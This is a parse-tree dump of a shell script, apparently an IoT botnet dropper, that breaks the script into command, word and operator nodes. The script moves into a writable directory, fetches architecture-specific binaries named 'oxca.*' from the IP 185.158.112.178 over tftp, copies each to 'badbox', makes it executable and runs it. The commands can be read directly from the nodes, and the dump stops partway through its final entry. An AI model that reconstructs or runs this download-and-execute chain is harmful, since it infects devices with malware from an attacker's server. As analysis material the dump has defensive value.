CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 182), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 140), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 121), word='oxca.mips'),
    WordNode(lineno=4, pos=(122, 124), word='-g'),
    WordNode(lineno=4, pos=(125, 140), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(140, 141)),
  CommandNode(lineno=4, pos=(141, 162), parts=[
    WordNode(lineno=4, pos=(141, 144), word='cat'),
    WordNode(lineno=4, pos=(145, 154), word='oxca.mips'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(156, 162), word='badbox'), pos=(155, 162), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(162, 163)),
  CommandNode(lineno=4, pos=(163, 173), parts=[
    WordNode(lineno=4, pos=(163, 168), word='chmod'),
    WordNode(lineno=4, pos=(169, 171), word='+x'),
    WordNode(lineno=4, pos=(172, 173), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(173, 174)),
  CommandNode(lineno=4, pos=(174, 182), parts=[
    WordNode(lineno=4, pos=(174, 182), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(183, 316), parts=[
  CommandNode(lineno=5, pos=(183, 190), parts=[
    WordNode(lineno=5, pos=(183, 185), word='cd'),
    WordNode(lineno=5, pos=(186, 190), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(191, 193)),
  CommandNode(lineno=5, pos=(194, 205), parts=[
    WordNode(lineno=5, pos=(194, 196), word='cd'),
    WordNode(lineno=5, pos=(197, 205), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(206, 208)),
  CommandNode(lineno=5, pos=(209, 216), parts=[
    WordNode(lineno=5, pos=(209, 211), word='cd'),
    WordNode(lineno=5, pos=(212, 216), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(217, 219)),
  CommandNode(lineno=5, pos=(220, 228), parts=[
    WordNode(lineno=5, pos=(220, 222), word='cd'),
    WordNode(lineno=5, pos=(223, 228), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(229, 231)),
  CommandNode(lineno=5, pos=(232, 236), parts=[
    WordNode(lineno=5, pos=(232, 234), word='cd'),
    WordNode(lineno=5, pos=(235, 236), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(236, 237)),
  CommandNode(lineno=5, pos=(238, 274), parts=[
    WordNode(lineno=5, pos=(238, 242), word='tftp'),
    WordNode(lineno=5, pos=(243, 245), word='-r'),
    WordNode(lineno=5, pos=(246, 255), word='oxca.mpsl'),
    WordNode(lineno=5, pos=(256, 258), word='-g'),
    WordNode(lineno=5, pos=(259, 274), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 296), parts=[
    WordNode(lineno=5, pos=(275, 278), word='cat'),
    WordNode(lineno=5, pos=(279, 288), word='oxca.mpsl'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(290, 296), word='badbox'), pos=(289, 296), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(296, 297)),
  CommandNode(lineno=5, pos=(297, 307), parts=[
    WordNode(lineno=5, pos=(297, 302), word='chmod'),
    WordNode(lineno=5, pos=(303, 305), word='+x'),
    WordNode(lineno=5, pos=(306, 307), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(307, 308)),
  CommandNode(lineno=5, pos=(308, 316), parts=[
    WordNode(lineno=5, pos=(308, 316), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(317, 448), parts=[
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 339), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 339), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(340, 342)),
  CommandNode(lineno=6, pos=(343, 350), parts=[
    WordNode(lineno=6, pos=(343, 345), word='cd'),
    WordNode(lineno=6, pos=(346, 350), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(351, 353)),
  CommandNode(lineno=6, pos=(354, 362), parts=[
    WordNode(lineno=6, pos=(354, 356), word='cd'),
    WordNode(lineno=6, pos=(357, 362), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(363, 365)),
  CommandNode(lineno=6, pos=(366, 370), parts=[
    WordNode(lineno=6, pos=(366, 368), word='cd'),
    WordNode(lineno=6, pos=(369, 370), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(370, 371)),
  CommandNode(lineno=6, pos=(372, 407), parts=[
    WordNode(lineno=6, pos=(372, 376), word='tftp'),
    WordNode(lineno=6, pos=(377, 379), word='-r'),
    WordNode(lineno=6, pos=(380, 388), word='oxca.sh4'),
    WordNode(lineno=6, pos=(389, 391), word='-g'),
    WordNode(lineno=6, pos=(392, 407), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(407, 408)),
  CommandNode(lineno=6, pos=(408, 428), parts=[
    WordNode(lineno=6, pos=(408, 411), word='cat'),
    WordNode(lineno=6, pos=(412, 420), word='oxca.sh4'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(422, 428), word='badbox'), pos=(421, 428), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(428, 429)),
  CommandNode(lineno=6, pos=(429, 439), parts=[
    WordNode(lineno=6, pos=(429, 434), word='chmod'),
    WordNode(lineno=6, pos=(435, 437), word='+x'),
    WordNode(lineno=6, pos=(438, 439), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(439, 440)),
  CommandNode(lineno=6, pos=(440, 448), parts=[
    WordNode(lineno=6, pos=(440, 448), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(449, 580), parts=[
  CommandNode(lineno=7, pos=(449, 456), parts=[
    WordNode(lineno=7, pos=(449, 451), word='cd'),
    WordNode(lineno=7, pos=(452, 456), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(457, 459)),
  CommandNode(lineno=7, pos=(460, 471), parts=[
    WordNode(lineno=7, pos=(460, 462), word='cd'),
    WordNode(lineno=7, pos=(463, 471), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(472, 474)),
  CommandNode(lineno=7, pos=(475, 482), parts=[
    WordNode(lineno=7, pos=(475, 477), word='cd'),
    WordNode(lineno=7, pos=(478, 482), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(483, 485)),
  CommandNode(lineno=7, pos=(486, 494), parts=[
    WordNode(lineno=7, pos=(486, 488), word='cd'),
    WordNode(lineno=7, pos=(489, 494), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(495, 497)),
  CommandNode(lineno=7, pos=(498, 502), parts=[
    WordNode(lineno=7, pos=(498, 500), word='cd'),
    WordNode(lineno=7, pos=(501, 502), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(502, 503)),
  CommandNode(lineno=7, pos=(504, 539), parts=[
    WordNode(lineno=7, pos=(504, 508), word='tftp'),
    WordNode(lineno=7, pos=(509, 511), word='-r'),
    WordNode(lineno=7, pos=(512, 520), word='oxca.x86'),
    WordNode(lineno=7, pos=(521, 523), word='-g'),
    WordNode(lineno=7, pos=(524, 539), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(539, 540)),
  CommandNode(lineno=7, pos=(540, 560), parts=[
    WordNode(lineno=7, pos=(540, 543), word='cat'),
    WordNode(lineno=7, pos=(544, 552), word='oxca.x86'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(554, 560), word='badbox'), pos=(553, 560), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(560, 561)),
  CommandNode(lineno=7, pos=(561, 571), parts=[
    WordNode(lineno=7, pos=(561, 566), word='chmod'),
    WordNode(lineno=7, pos=(567, 569), word='+x'),
    WordNode(lineno=7, pos=(570, 571), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(571, 572)),
  CommandNode(lineno=7, pos=(572, 580), parts=[
    WordNode(lineno=7, pos=(572, 580), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(581, 716), parts=[
  CommandNode(lineno=8, pos=(581, 588), parts=[
    WordNode(lineno=8, pos=(581, 583), word='cd'),
    WordNode(lineno=8, pos=(584, 588), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(589, 591)),
  CommandNode(lineno=8, pos=(592, 603), parts=[
    WordNode(lineno=8, pos=(592, 594), word='cd'),
    WordNode(lineno=8, pos=(595, 603), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(604, 606)),
  CommandNode(lineno=8, pos=(607, 614), parts=[
    WordNode(lineno=8, pos=(607, 609), word='cd'),
    WordNode(lineno=8, pos=(610, 614), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(615, 617)),
  CommandNode(lineno=8, pos=(618, 626), parts=[
    WordNode(lineno=8, pos=(618, 620), word='cd'),
    WordNode(lineno=8, pos=(621, 626), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(627, 629)),
  CommandNode(lineno=8, pos=(630, 634), parts=[
    WordNode(lineno=8, pos=(630, 632), word='cd'),
    WordNode(lineno=8, pos=(633, 634), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(634, 635)),
  CommandNode(lineno=8, pos=(636, 673), parts=[
    WordNode(lineno=8, pos=(636, 640), word='tftp'),
    WordNode(lineno=8, pos=(641, 643), word='-r'),
    WordNode(lineno=8, pos=(644, 654), word='oxca.arm61'),
    WordNode(lineno=8, pos=(655, 657), word='-g'),
    WordNode(lineno=8, pos=(658, 673), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(673, 674)),
  CommandNode(lineno=8, pos=(674, 696), parts=[
    WordNode(lineno=8, pos=(674, 677), word='cat'),
    WordNode(lineno=8, pos=(678, 688), word='oxca.arm61'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(690, 696), word='badbox'), pos=(689, 696), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(696, 697)),
  CommandNode(lineno=8, pos=(697, 707), parts=[
    WordNode(lineno=8, pos=(697, 702), word='chmod'),
    WordNode(lineno=8, pos=(703, 705), word='+x'),
    WordNode(lineno=8, pos=(706, 707), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(707, 708)),
  CommandNode(lineno=8, pos=(708, 716), parts=[
    WordNode(lineno=8, pos=(708, 716), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(717, 850), parts=[
  CommandNode(lineno=9, pos=(717, 724), parts=[
    WordNode(lineno=9, pos=(717, 719), word='cd'),
    WordNode(lineno=9, pos=(720, 724), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(725, 727)),
  CommandNode(lineno=9, pos=(728, 739), parts=[
    WordNode(lineno=9, pos=(728, 730), word='cd'),
    WordNode(lineno=9, pos=(731, 739), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(740, 742)),
  CommandNode(lineno=9, pos=(743, 750), parts=[
    WordNode(lineno=9, pos=(743, 745), word='cd'),
    WordNode(lineno=9, pos=(746, 750), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(751, 753)),
  CommandNode(lineno=9, pos=(754, 762), parts=[
    WordNode(lineno=9, pos=(754, 756), word='cd'),
    WordNode(lineno=9, pos=(757, 762), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(763, 765)),
  CommandNode(lineno=9, pos=(766, 770), parts=[
    WordNode(lineno=9, pos=(766, 768), word='cd'),
    WordNode(lineno=9, pos=(769, 770), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(770, 771)),
  CommandNode(lineno=9, pos=(772, 808), parts=[
    WordNode(lineno=9, pos=(772, 776), word='tftp'),
    WordNode(lineno=9, pos=(777, 779), word='-r'),
    WordNode(lineno=9, pos=(780, 789), word='oxca.i686'),
    WordNode(lineno=9, pos=(790, 792), word='-g'),
    WordNode(lineno=9, pos=(793, 808), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(808, 809)),
  CommandNode(lineno=9, pos=(809, 830), parts=[
    WordNode(lineno=9, pos=(809, 812), word='cat'),
    WordNode(lineno=9, pos=(813, 822), word='oxca.i686'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(824, 830), word='badbox'), pos=(823, 830), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(830, 831)),
  CommandNode(lineno=9, pos=(831, 841), parts=[
    WordNode(lineno=9, pos=(831, 836), word='chmod'),
    WordNode(lineno=9, pos=(837, 839), word='+x'),
    WordNode(lineno=9, pos=(840, 841), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(841, 842)),
  CommandNode(lineno=9, pos=(842, 850), parts=[
    WordNode(lineno=9, pos=(842, 850), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(851, 982), parts=[
  CommandNode(lineno=10, pos=(851, 858), parts=[
    WordNode(lineno=10, pos=(851, 853), word='cd'),
    WordNode(lineno=10, pos=(854, 858), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(859, 861)),
  CommandNode(lineno=10, pos=(862, 873), parts=[
    WordNode(lineno=10, pos=(862, 864), word='cd'),
    WordNode(lineno=10, pos=(865, 873), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(874, 876)),
  CommandNode(lineno=10, pos=(877, 884), parts=[
    WordNode(lineno=10, pos=(877, 879), word='cd'),
    WordNode(lineno=10, pos=(880, 884), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(885, 887)),
  CommandNode(lineno=10, pos=(888, 896), parts=[
    WordNode(lineno=10, pos=(888, 890), word='cd'),
    WordNode(lineno=10, pos=(891, 896), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(897, 899)),
  CommandNode(lineno=10, pos=(900, 904), parts=[
    WordNode(lineno=10, pos=(900, 902), word='cd'),
    WordNode(lineno=10, pos=(903, 904), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(904, 905)),
  CommandNode(lineno=10, pos=(906, 941), parts=[
    WordNode(lineno=10, pos=(906, 910), word='tftp'),
    WordNode(lineno=10, pos=(911, 913), word='-r'),
    WordNode(lineno=10, pos=(914, 922), word='oxca.ppc'),
    WordNode(lineno=10, pos=(923, 925), word='-g'),
    WordNode(lineno=10, pos=(926, 941), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(941, 942)),
  CommandNode(lineno=10, pos=(942, 962), parts=[
    WordNode(lineno=10, pos=(942, 945), word='cat'),
    WordNode(lineno=10, pos=(946, 954), word='oxca.ppc'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(956, 962), word='badbox'), pos=(955, 962), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(962, 963)),
  CommandNode(lineno=10, pos=(963, 973), parts=[
    WordNode(lineno=10, pos=(963, 968), word='chmod'),
    WordNode(lineno=10, pos=(969, 971), word='+x'),
    WordNode(lineno=10, pos=(972, 973), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(973, 974)),
  CommandNode(lineno=10, pos=(974, 982), parts=[
    WordNode(lineno=10, pos=(974, 982), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(983, 1116), parts=[
  CommandNode(lineno=11, pos=(983, 990), parts=[
    WordNode(lineno=11, pos=(983, 985), word='cd'),
    WordNode(lineno=11, pos=(986, 990), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(991, 993)),
  CommandNode(lineno=11, pos=(994, 1005), parts=[
    WordNode(lineno=11, pos=(994, 996), word='cd'),
    WordNode(lineno=11, pos=(997, 1005), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1006, 1008)),
  CommandNode(lineno=11, pos=(1009, 1016), parts=[
    WordNode(lineno=11, pos=(1009, 1011), word='cd'),
    WordNode(lineno=11, pos=(1012, 1016), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1017, 1019)),
  CommandNode(lineno=11, pos=(1020, 1028), parts=[
    WordNode(lineno=11, pos=(1020, 1022), word='cd'),
    WordNode(lineno=11, pos=(1023, 1028), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1029, 1031)),
  CommandNode(lineno=11, pos=(1032, 1036), parts=[
    WordNode(lineno=11, pos=(1032, 1034), word='cd'),
    WordNode(lineno=11, pos=(1035, 1036), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1036, 1037)),
  CommandNode(lineno=11, pos=(1038, 1074), parts=[
    WordNode(lineno=11, pos=(1038, 1042), word='tftp'),
    WordNode(lineno=11, pos=(1043, 1045), word='-r'),
    WordNode(lineno=11, pos=(1046, 1055), word='oxca.i586'),
    WordNode(lineno=11, pos=(1056, 1058), word='-g'),
    WordNode(lineno=11, pos=(1059, 1074), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1074, 1075)),
  CommandNode(lineno=11, pos=(1075, 1096), parts=[
    WordNode(lineno=11, pos=(1075, 1078), word='cat'),
    WordNode(lineno=11, pos=(1079, 1088), word='oxca.i586'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1090, 1096), word='badbox'), pos=(1089, 1096), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1096, 1097)),
  CommandNode(lineno=11, pos=(1097, 1107), parts=[
    WordNode(lineno=11, pos=(1097, 1102), word='chmod'),
    WordNode(lineno=11, pos=(1103, 1105), word='+x'),
    WordNode(lineno=11, pos=(1106, 1107), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1107, 1108)),
  CommandNode(lineno=11, pos=(1108, 1116), parts=[
    WordNode(lineno=11, pos=(1108, 1116), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1117, 1250), parts=[
  CommandNode(lineno=12, pos=(1117, 1124), parts=[
    WordNode(lineno=12, pos=(1117, 1119), word='cd'),
    WordNode(lineno=12, pos=(1120, 1124), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1125, 1127)),
  CommandNode(lineno=12, pos=(1128, 1139), parts=[
    WordNode(lineno=12, pos=(1128, 1130), word='cd'),
    WordNode(lineno=12, pos=(1131, 1139), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1140, 1142)),
  CommandNode(lineno=12, pos=(1143, 1150), parts=[
    WordNode(lineno=12, pos=(1143, 1145), word='cd'),
    WordNode(lineno=12, pos=(1146, 1150), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1151, 1153)),
  CommandNode(lineno=12, pos=(1154, 1162), parts=[
    WordNode(lineno=12, pos=(1154, 1156), word='cd'),
    WordNode(lineno=12, pos=(1157, 1162), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1163, 1165)),
  CommandNode(lineno=12, pos=(1166, 1170), parts=[
    WordNode(lineno=12, pos=(1166, 1168), word='cd'),
    WordNode(lineno=12, pos=(1169, 1170), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1170, 1171)),
  CommandNode(lineno=12, pos=(1172, 1208), parts=[
    WordNode(lineno=12, pos=(1172, 1176), word='tftp'),
    WordNode(lineno=12, pos=(1177, 1179), word='-r'),
    WordNode(lineno=12, pos=(1180, 1189), word='oxca.m68k'),
    WordNode(lineno=12, pos=(1190, 1192), word='-g'),
    WordNode(lineno=12, pos=(1193, 1208), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1208, 1209)),
  CommandNode(lineno=12, pos=(1209, 1230), parts=[
    WordNode(lineno=12, pos=(1209, 1212), word='cat'),
    WordNode(lineno=12, pos=(1213, 1222), word='oxca.m68k'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1224, 1230), word='badbox'), pos=(1223, 1230), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1230, 1231)),
  CommandNode(lineno=12, pos=(1231, 1241), parts=[
    WordNode(lineno=12, pos=(1231, 1236), word='chmod'),
    WordNode(lineno=12, pos=(1237, 1239), word='+x'),
    WordNode(lineno=12, pos=(1240, 1241), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1241, 1242)),
  CommandNode(lineno=12, pos=(1242, 1250), parts=[
    WordNode(lineno=12, pos=(1242, 1250), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1251, 1382), parts=[
  CommandNode(lineno=13, pos=(1251, 1258), parts=[
    WordNode(lineno=13, pos=(1251, 1253), word='cd'),
    WordNode(lineno=13, pos=(1254, 1258), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1259, 1261)),
  CommandNode(lineno=13, pos=(1262, 1273), parts=[
    WordNode(lineno=13, pos=(1262, 1264), word='cd'),
    WordNode(lineno=13, pos=(1265, 1273), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1274, 1276)),
  CommandNode(lineno=13, pos=(1277, 1284), parts=[
    WordNode(lineno=13, pos=(1277, 1279), word='cd'),
    WordNode(lineno=13, pos=(1280, 1284), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1285, 1287)),
  CommandNode(lineno=13, pos=(1288, 1296), parts=[
    WordNode(lineno=13, pos=(1288, 1290), word='cd'),
    WordNode(lineno=13, pos=(1291, 1296), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1297, 1299)),
  CommandNode(lineno=13, pos=(1300, 1304), parts=[
    WordNode(lineno=13, pos=(1300, 1302), word='cd'),
    WordNode(lineno=13, pos=(1303, 1304), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1304, 1305)),
  CommandNode(lineno=13, pos=(1306, 1341), parts=[
    WordNode(lineno=13, pos=(1306, 1310), word='tftp'),
    WordNode(lineno=13, pos=(1311, 1313), word='-r'),
    WordNode(lineno=13, pos=(1314, 1322), word='oxca.spc'),
    WordNode(lineno=13, pos=(1323, 1325), word='-g'),
    WordNode(lineno=13, pos=(1326, 1341), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1341, 1342)),
  CommandNode(lineno=13, pos=(1342, 1362), parts=[
    WordNode(lineno=13, pos=(1342, 1345), word='cat'),
    WordNode(lineno=13, pos=(1346, 1354), word='oxca.spc'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1356, 1362), word='badbox'), pos=(1355, 1362), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1362, 1363)),
  CommandNode(lineno=13, pos=(1363, 1373), parts=[
    WordNode(lineno=13, pos=(1363, 1368), word='chmod'),
    WordNode(lineno=13, pos=(1369, 1371), word='+x'),
    WordNode(lineno=13, pos=(1372, 1373), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1373, 1374)),
  CommandNode(lineno=13, pos=(1374, 1382), parts=[
    WordNode(lineno=13, pos=(1374, 1382), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1383, 1518), parts=[
  CommandNode(lineno=14, pos=(1383, 1390), parts=[
    WordNode(lineno=14, pos=(1383, 1385), word='cd'),
    WordNode(lineno=14, pos=(1386, 1390), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1391, 1393)),
  CommandNode(lineno=14, pos=(1394, 1405), parts=[
    WordNode(lineno=14, pos=(1394, 1396), word='cd'),
    WordNode(lineno=14, pos=(1397, 1405), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1406, 1408)),
  CommandNode(lineno=14, pos=(1409, 1416), parts=[
    WordNode(lineno=14, pos=(1409, 1411), word='cd'),
    WordNode(lineno=14, pos=(1412, 1416), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1417, 1419)),
  CommandNode(lineno=14, pos=(1420, 1428), parts=[
    WordNode(lineno=14, pos=(1420, 1422), word='cd'),
    WordNode(lineno=14, pos=(1423, 1428), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1429, 1431)),
  CommandNode(lineno=14, pos=(1432, 1436), parts=[
    WordNode(lineno=14, pos=(1432, 1434), word='cd'),
    WordNode(lineno=14, pos=(1435, 1436), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1436, 1437)),
  CommandNode(lineno=14, pos=(1438, 1475), parts=[
    WordNode(lineno=14, pos=(1438, 1442), word='tftp'),
    WordNode(lineno=14, pos=(1443, 1445), word='-r'),
    WordNode(lineno=14, pos=(1446, 1456), word='oxca.arm41'),
    WordNode(lineno=14, pos=(1457, 1459), word='-g'),
    WordNode(lineno=14, pos=(1460, 1475), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1475, 1476)),
  CommandNode(lineno=14, pos=(1476, 1498), parts=[
    WordNode(lineno=14, pos=(1476, 1479), word='cat'),
    WordNode(lineno=14, pos=(1480, 1490), word='oxca.arm41'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1492, 1498), word='badbox'), pos=(1491, 1498), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1498, 1499)),
  CommandNode(lineno=14, pos=(1499, 1509), parts=[
    WordNode(lineno=14, pos=(1499, 1504), word='chmod'),
    WordNode(lineno=14, pos=(1505, 1507), word='+x'),
    WordNode(lineno=14, pos=(1508, 1509), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1509, 1510)),
  CommandNode(lineno=14, pos=(1510, 1518), parts=[
    WordNode(lineno=14, pos=(1510, 1518), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1519, 1654), parts=[
  CommandNode(lineno=15, pos=(1519, 1526), parts=[
    WordNode(lineno=15, pos=(1519, 1521), word='cd'),
    WordNode(lineno=15, pos=(1522, 1526), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1527, 1529)),
  CommandNode(lineno=15, pos=(1530, 1541), parts=[
    WordNode(lineno=15, pos=(1530, 1532), word='cd'),
    WordNode(lineno=15, pos=(1533, 1541), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1542, 1544)),
  CommandNode(lineno=15, pos=(1545, 1552), parts=[
    WordNode(lineno=15, pos=(1545, 1547), word='cd'),
    WordNode(lineno=15, pos=(1548, 1552), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1553, 1555)),
  CommandNode(lineno=15, pos=(1556, 1564), parts=[
    WordNode(lineno=15, pos=(1556, 1558), word='cd'),
    WordNode(lineno=15, pos=(1559, 1564), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1565, 1567)),
  CommandNode(lineno=15, pos=(1568, 1572), parts=[
    WordNode(lineno=15, pos=(1568, 1570), word='cd'),
    WordNode(lineno=15, pos=(1571, 1572), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1572, 1573)),
  CommandNode(lineno=15, pos=(1574, 1611), parts=[
    WordNode(lineno=15, pos=(1574, 1578), word='tftp'),
    WordNode(lineno=15, pos=(1579, 1581), word='-r'),
    WordNode(lineno=15, pos=(1582, 1592), word='oxca.arm51'),
    WordNode(lineno=15, pos=(1593, 1595), word='-g'),
    WordNode(lineno=15, pos=(1596, 1611), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1611, 1612)),
  CommandNode(lineno=15, pos=(1612, 1634), parts=[
    WordNode(lineno=15, pos=(1612, 1615), word='cat'),
    WordNode(lineno=15, pos=(1616, 1626), word='oxca.arm51'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1628, 1634), word='badbox'), pos=(1627, 1634), type='>'),
  ]),
